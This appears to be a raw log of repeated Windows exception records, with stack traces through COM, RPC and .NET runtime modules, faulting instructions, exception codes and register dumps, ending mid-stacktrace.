CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda7a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 48752240
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 48758192
registers.r11: 48754000
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1975475068
registers.r13: 0
1 0 0

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda7a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 49275088
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 49281040
registers.r11: 49276848
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1974949214
registers.r13: 0
1 0 0

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda7a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 48556128
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 48562080
registers.r11: 48557888
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1975280055
registers.r13: 0
1 0 0

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda7a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 48620928
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 48626880
registers.r11: 48622688
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1975347552
registers.r13: 0
1 0 0

__exception__

stacktrace:
0xaf0567
0xaf0308
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72ad74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72ad7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72b61dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72b61e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72b61f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72b6416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f1f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74317f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74314de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xaf06a9
registers.esp: 1830292
registers.edi: 40848380
registers.eax: 0
registers.ebp: 1830332
registers.edx: 195
registers.ebx: 1830628
registers.esi: 40853068
registers.ecx: 0
1 0 0

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda7a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 42066608
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 42072560
registers.r11: 42068368
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1977166221
registers.r13: 0
1 0 0

__exception__

stacktrace:
0x8c0567
0x8c0308
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72ad74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72ad7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72b61dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72b61e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72b61f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72b6416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f1f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74317f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74314de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c06a9
registers.esp: 3403988
registers.edi: 36719672
registers.eax: 0
registers.ebp: 3404028
registers.edx: 195
registers.ebx: 3404316
registers.esi: 36724360
registers.ecx: 0
1 0 0

__exception__

stacktrace:
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 48 04 39 09 e8 4c 3b 96 70 85 c0 0f 8e 73 ff
exception.instruction: mov ecx, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c435a
registers.esp: 95088796
registers.edi: 95088908
registers.eax: 0
registers.ebp: 95088832
registers.edx: 6642872
registers.ebx: 36719548
registers.esi: 36719528
registers.ecx: 1924926809
1 0 0

__exception__

stacktrace:
0x8c4680
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 39 09 e8 ef 50 96 70 eb 11 8b c8 e8 56 ef 98 72
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c46ca
registers.esp: 95088748
registers.edi: 95088772
registers.eax: 0
registers.ebp: 95088788
registers.edx: 6642872
registers.ebx: 36719548
registers.esi: 36719528
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x8c4680
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 28 ff 50 1c eb 11 8b c8 e8 35 ef 98
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c46ea
registers.esp: 95088748
registers.edi: 95088772
registers.eax: 95088748
registers.ebp: 95088788
registers.edx: 9193188
registers.ebx: 36719548
registers.esi: 36719528
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x8c4680
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: 8b 01 8b 40 30 ff 50 10 eb 11 8b c8 e8 14 ef 98
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8c470b
registers.esp: 95088748
registers.edi: 95088772
registers.eax: 95088748
registers.ebp: 95088788
registers.edx: 9193221
registers.ebx: 36719548
registers.esi: 36719528
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x8c0567
0x8c4eea
0x8c4e51
0x8c3ab4
mscorlib+0x30c9ff @ 0x71d5c9ff
mscorlib+0x302367 @ 0x71d52367
mscorlib+0x3022a6 @ 0x71d522a6
mscorlib+0x302261 @ 0x71d52261
mscorlib+0x30ca7c @ 0x71d5ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88
